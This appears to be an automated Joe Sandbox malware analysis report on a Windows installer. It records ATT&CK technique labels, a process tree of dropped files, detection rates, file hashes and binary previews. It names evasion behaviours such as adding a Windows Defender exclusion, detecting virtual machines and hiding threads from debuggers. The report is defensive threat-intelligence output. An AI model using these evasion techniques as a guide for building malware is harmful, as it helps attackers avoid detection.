Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Command and Scripting Interpreter [2]; Service Execution [1]; Native API [1]; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Windows Service [1]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Access Token Manipulation [1]; Windows Service [1]; Process Injection [111]; DLL Side-Loading [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading [11]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [231]; Access Token Manipulation [1]; Process Injection [111]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [1]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery [1]; Security Software Discovery [421]; Virtualization/Sandbox Evasion [231]; Process Discovery [2]; Application Window Discovery [1]; System Owner/User Discovery [2]; File and Directory Discovery [3]; System Information Discovery [25]; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel [1]; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1579694; sample: #U5b89#U88c5#U52a9#U624b_2.0.5.exe; start date: 23/12/2024; architecture: WINDOWS; score: 96), recovered as a process tree:

Signatures at the root: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; Found driver which could be used to inject code into processes; 3 other signatures

#U5b89#U88c5#U52a9#U624b_2.0.5.exe
  dropped: C:\...\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp (PE32)
  -> #U5b89#U88c5#U52a9#U624b_2.0.5.tmp
       dropped: C:\Users\user\AppData\Local\...\update.vac (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
       signature: Adds a directory exclusion to Windows Defender
       -> #U5b89#U88c5#U52a9#U624b_2.0.5.exe
            dropped: C:\...\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp (PE32)
            -> #U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                 dropped: C:\Users\user\AppData\Local\...\update.vac (PE32); C:\Program Files (x86)\...\trash (copy) (PE32+); C:\Program Files (x86)\...\is-HSQ4G.tmp (PE32+); 3 other files (1 malicious)
                 signatures: Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; Hides threads from debuggers; Contains functionality to hide a thread from the debugger
                 -> 7zr.exe
                      dropped: C:\Program Files (x86)\...\tProtect.dll (PE32+)
                      -> conhost.exe
                 -> 7zr.exe
                      -> conhost.exe
       -> powershell.exe
            signature: Loading BitLocker PowerShell Module
            -> conhost.exe
            -> WmiPrvSE.exe
cmd.exe
  -> sc.exe
       -> 2 other processes
cmd.exe
  -> sc.exe
       -> conhost.exe
30 other processes
  -> sc.exe -> conhost.exe
  -> sc.exe -> conhost.exe
  -> sc.exe -> conhost.exe
  -> 26 other processes
       -> conhost.exe
       -> 25 other processes

Source | Detection | Scanner
#U5b89#U88c5#U52a9#U624b_2.0.5.exe | 8% | Virustotal
#U5b89#U88c5#U52a9#U624b_2.0.5.exe | 0% | ReversingLabs

Source | Detection | Scanner
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | Virustotal
C:\Program Files (x86)\Windows NT\hrsw.vbc | 11% | ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc | 10% | Virustotal
C:\Program Files (x86)\Windows NT\is-HSQ4G.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\is-HSQ4G.tmp | 0% | Virustotal
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-5R3K0.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-5R3K0.tmp\update.vac | 11% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-LMQ7E.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-LMQ7E.tmp\update.vac | 11% | ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://aria2.github.io/Usage: | #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.dr | false | | high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | #U5b89#U88c5#U52a9#U624b_2.0.5.exe | false | | high
https://github.com/aria2/aria2/issuesReport | #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.dr | false | | high
http://www.metalinker.org/ | #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.dr | false | | high
https://www.remobjects.com/ps | #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.1422423132.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.1422859816.000000007F22B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000000.1424499799.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000007.00000000.1515986728.0000000000B2D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.6.dr, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.dr | false | | high
https://aria2.github.io/ | #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.dr | false | | high
https://github.com/aria2/aria2/issues | #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.dr | false | | high
https://www.innosetup.com/ | #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.1422423132.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.1422859816.000000007F22B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000000.1424499799.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000007.00000000.1515986728.0000000000B2D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.6.dr, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.dr | false | | high
http://www.metalinker.org/basic_string::_M_construct | #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.dr | false | | high
                    No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579694
Start date and time: 2024-12-23 07:51:47 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 108
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Sample name: #U5b89#U88c5#U52a9#U624b_2.0.5.exe (renamed because the original name is a hash value)
Original Sample Name: _2.0.5.exe
Detection: MAL
Classification: mal96.evad.winEXE@140/32@0/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 76%
• Number of executed functions: 28
• Number of non-executed functions: 84
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
No simulations
No context
No context
No context
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Context
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b_2.0.4.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b_2.0.4.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\7zr.exe | Zt43pLXYiu.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b_1.0.9.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\7zr.exe | Zt43pLXYiu.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b_1.0.1.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b_1.0.8.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b_1.0.9.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b_1.0.1.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U52a9#U624b_2.0.4.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U52a9#U624b_2.0.4.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\hrsw.vbc | Zt43pLXYiu.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U52a9#U624b_1.0.9.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\hrsw.vbc | Zt43pLXYiu.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U52a9#U624b_1.0.1.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U52a9#U624b_1.0.8.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U52a9#U624b_1.0.9.exe | | malicious | Unknown |
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U52a9#U624b_1.0.1.exe | | malicious | Unknown |
Process: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 831200
Entropy (8bit): 6.671005303304742
Encrypted: false
SSDEEP: 24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
MD5: 84DC4B92D860E8AEA55D12B1E87EA108
SHA1: 56074A031A81A2394770D4DA98AC01D99EC77AAD
SHA-256: BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
SHA-512: CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious
• Filename: Zt43pLXYiu.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious
• Filename: Zt43pLXYiu.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
File Type: data
Category: dropped
Size (bytes): 249984
Entropy (8bit): 7.999231321310217
Encrypted: true
SSDEEP: 6144:oO69JOSTLGHS0jDdUlJ4CzxF07OkYK019Ybi:x67OY6y0jhUMCVsBjbi
MD5: 11518A96514343C3195F339C0F0C514F
SHA1: FB72B4940CFC18C85BF2FC0F135F24DE70B5FE43
SHA-256: 98365E00DF900A68CADE6F6D4EF1630731882177B80D326AC304ABC053AE9D78
SHA-512: 978A7CFDF3AE50E96ABD7AE4C46BD9CD377F3108323CD6B8FB13A3651968C3E48FDFFE41E7B4F6E8C4144BAC78C576EB57E20B6A7DFA2F3B12802D7D1F2C01FF
Malicious: false
                                                        Preview:.@S.....i?S.,..............u.#....^..I.&..4.E.z..hg9`.[1...R....F.O...n.'............L.J.5..31.....iI*.F..S./......&w.)..:...V...uW....4........_.......B.$..F<...........D3....#.>..Yh{rO!.9>k..>..U.i...(..i.../Q...U..q.W6.._t..+(.......Z....b...OK.....p.....^...~7.....C.>.......Q....K.^.......p.|.]O....07.yy.1X.Pr.4...wm.E..2....$..5..g...2=,........7,.^`S.RM..84.Bb.&PgJV..x.9....9Z.3.)..y.O`J....O...C.?...@..d.DJ....1K..F3b.=b......W......m.e...!a..*.i...%.bA....DI..~.....q........{HQ.".......Xn.G#~0.h&...RN".~./.t....n0...7.w.2.#N.W$.<...B... z.....!Y.x$...R..A{.z.U..q.S&..G.&...`...J*.*.'.Y..9..`...:.E...d...cE...P..T.H.........=.e.X..[mR*@OT7./.v...Z.OG.p6.E^.!.e....g.........i(xc...Gb.u=......t.KV...c........|......w.x...+..6..PP..I....~.iP.....K..g>..(*..cq..........J..S..]O..[...w.K....EG..o..=.(\.....8z....5..?.R$...).xR"\A..O#v.:...RK.\...U...~<...a.h..2.h....v.wq.....*...$.&a..w."..a.j...e...hH...u.a.?tU....0.^{..cb.....
Process: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3598848
Entropy (8bit): 7.004949099807939
Encrypted: false
SSDEEP: 49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
MD5: 1D1464C73252978A58AC925ECE57F0FB
SHA1: 30E442BE965F96F3EB75A3ABDB61B90E5A506993
SHA-256: 05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
SHA-512: 40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 11%
• Antivirus: Virustotal, Detection: 10%
Joe Sandbox View:
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious
• Filename: Zt43pLXYiu.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious
• Filename: Zt43pLXYiu.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious
                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                        Category:dropped
                                                        Size (bytes):5649408
                                                        Entropy (8bit):6.392614480390128
                                                        Encrypted:false
                                                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        • Antivirus: Virustotal, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):249984
                                                        Entropy (8bit):7.999231321310217
                                                        Encrypted:true
                                                        SSDEEP:6144:oO69JOSTLGHS0jDdUlJ4CzxF07OkYK019Ybi:x67OY6y0jhUMCVsBjbi
                                                        MD5:11518A96514343C3195F339C0F0C514F
                                                        SHA1:FB72B4940CFC18C85BF2FC0F135F24DE70B5FE43
                                                        SHA-256:98365E00DF900A68CADE6F6D4EF1630731882177B80D326AC304ABC053AE9D78
                                                        SHA-512:978A7CFDF3AE50E96ABD7AE4C46BD9CD377F3108323CD6B8FB13A3651968C3E48FDFFE41E7B4F6E8C4144BAC78C576EB57E20B6A7DFA2F3B12802D7D1F2C01FF
                                                        Malicious:false
                                                        Preview:.@S.....i?S.,..............u.#....^..I.&..4.E.z..hg9`.[1...R....F.O...n.'............L.J.5..31.....iI*.F..S./......&w.)..:...V...uW....4........_.......B.$..F<...........D3....#.>..Yh{rO!.9>k..>..U.i...(..i.../Q...U..q.W6.._t..+(.......Z....b...OK.....p.....^...~7.....C.>.......Q....K.^.......p.|.]O....07.yy.1X.Pr.4...wm.E..2....$..5..g...2=,........7,.^`S.RM..84.Bb.&PgJV..x.9....9Z.3.)..y.O`J....O...C.?...@..d.DJ....1K..F3b.=b......W......m.e...!a..*.i...%.bA....DI..~.....q........{HQ.".......Xn.G#~0.h&...RN".~./.t....n0...7.w.2.#N.W$.<...B... z.....!Y.x$...R..A{.z.U..q.S&..G.&...`...J*.*.'.Y..9..`...:.E...d...cE...P..T.H.........=.e.X..[mR*@OT7./.v...Z.OG.p6.E^.!.e....g.........i(xc...Gb.u=......t.KV...c........|......w.x...+..6..PP..I....~.iP.....K..g>..(*..cq..........J..S..]O..[...w.K....EG..o..=.(\.....8z....5..?.R$...).xR"\A..O#v.:...RK.\...U...~<...a.h..2.h....v.wq.....*...$.&a..w."..a.j...e...hH...u.a.?tU....0.^{..cb.....
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):56546
                                                        Entropy (8bit):7.997020385738187
                                                        Encrypted:true
                                                        SSDEEP:1536:HH0XLz6hYcW9MqEMv94PUICwNW6apEIeq0/cR:HHvvW9NE54efcR
                                                        MD5:5AE192345F0F69A9B67788EB3F38FB9B
                                                        SHA1:C9ACF1FAC77D08FB8DF1443D067D171B089EF959
                                                        SHA-256:64FE275448F9A1FB87250C7D4AD637274C259F2958E3BB58D68E722DD91E9CC7
                                                        SHA-512:A5B9AA3870DCA279A055B2CDBDD903E3A0525D23E8CD01181686ECFBFE67F6A576B924CD582256C74F0BB22100A0D02F8270B9679728C65E023E0E342AA89998
                                                        Malicious:false
                                                        Preview:.@S...._..l ..............).....TcxC..xe.Q.....?E6jnzk.g;..aW;'...!+..y.....Jc..r.U..z.f.hI4A...3t.C...<..g,...~.O.f......%x.R..s.HMG.{.......3.Vpk%.......W.........,....V..q...Ro.8,U.q...........?c.q....+.(S._...v.)~...8.P..t.R..!..9.B.....f..F.}.....s_L..w..G...;...K..z..O.`.d.Z..9...s7u.3...fe.w..Y....{...?.@.:v..F2 -.....a..s......5dV...n.${..k.F%].v.'.....9.|.y..#N..c....0...f.e6.SY......x.e......#K.0...&..i.(.J...T..t..V..gk....+^FN@J0R.Z..bB.>...xk....xh..i.!1<..A>p...y...(........[..u~q..L.OH.-Y.....".....k/1`...7..@.o.C.P.(g@...m:-..|.B...{~.-('.......;.kZ..c..y..w3u4.;...../-G.V.g....y.-hV~P......@.,...C...N.{{p..X.......*H...Tu..&...qTo..>....}P....>.:F|.....5.......$..>c...].._......b...+y..Pc..G.(...o.|.....V]/..\....^)..ERB2.X.........K\(........~^.m..v...).'..M.:...3<..e..&Uj.........,..-9.}.....VI..:..<....6R.{Tl.X....j&C....vI,*...x;....CX.......b.6[..CB....J...k.j.p. e..c.8(...v....d..,.E.!j.V...#.H..3..W.$
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):56546
                                                        Entropy (8bit):7.9970203857381925
                                                        Encrypted:true
                                                        SSDEEP:1536:drlLRqRByqzVF8GNxmsf+KlTzr3Dq9MgvNeIRlQj:dr+BtVF8GnmsxcMg1eIRSj
                                                        MD5:749867F354FA0A2E41EBC1FD6F8DC516
                                                        SHA1:C8D2532139FE2A265D4ED10E30A807176F8F3BAA
                                                        SHA-256:B80ADB9791998685A921FFFEFBE66B059F56C0CF0055DBBCCB4515B60F6337C1
                                                        SHA-512:14D24D465B4608DE0FE31D86C45D20F4A97C492D13F12FA62EF7290AC1CB2FE9A65FA09702497E76FBDF8D9894487B7D9E182E514B7EE3785F824DC944709492
                                                        Malicious:false
                                                        Preview:7z..'.....:u........2........4.!.-.....N...H..M 18.....&..G.....VHJ..@..1.x.9....P.U....<...}.V.k.^....Q..VX4.!D.=..3F...;.P....n.....L..j.&.?.0^....E...i\A.5F...CzO..D..]&B..Z .L}...Z..m.P...OI.5J"{./...5v.u...:.1.....mA..V.?...PW.z*...b.4.d.g..`.+`?PE....o...\...M...Z;.N....0....1t.&(I....B...j.........9...T.O.u...m<....[..7..v4..W..#L^c..P.).+.G......f.)x.S...8.l. -.]...\k.4.<.n....Q0.D.I.:.(#PU.CLe...B.P...M~.N.4e...%.......Hp...(.o.......3.iF..".w.b..A-6...R......R...pc5L.....fgN.=_7U/.E..z.M....3R.5qq.)....p.?....X(.l..o.s.t.I..6U.T....K...d.......!..i.O.....U...z.w....m..7+....).&..S.M.......[Z.j....e.k.k.7.n...a..LR.>..-.85....x.y}.....v...g...r..C.....N.U3{(..'..\l.....{...5$.|..=^...l...R...(.f...=.;...m.=>.w....5.]..q.. *O.....`.{.|..TR#\z......(ETpTV..}.q..y`....53.P..,H'.../W..0..[..h..]...-...y..8InU.}..6......%T.sI..)...9.UYyZ...4{1n......5=..._7`4....h+..g.V...M...YR..&8...}...#(....g.-..?a7q9.%pu.'._...N...C.t...XNZ.L.
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):56546
                                                        Entropy (8bit):7.996966859255975
                                                        Encrypted:true
                                                        SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                                        MD5:CEA69F993E1CE0FB945A98BF37A66546
                                                        SHA1:7114365265F041DA904574D1F5876544506F89BA
                                                        SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                                        SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                                        Malicious:false
                                                        Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                                        Process:C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):56546
                                                        Entropy (8bit):7.996966859255979
                                                        Encrypted:true
                                                        SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                                        MD5:4CB8B7E557C80FC7B014133AB834A042
                                                        SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                                        SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                                        SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                                        Malicious:false
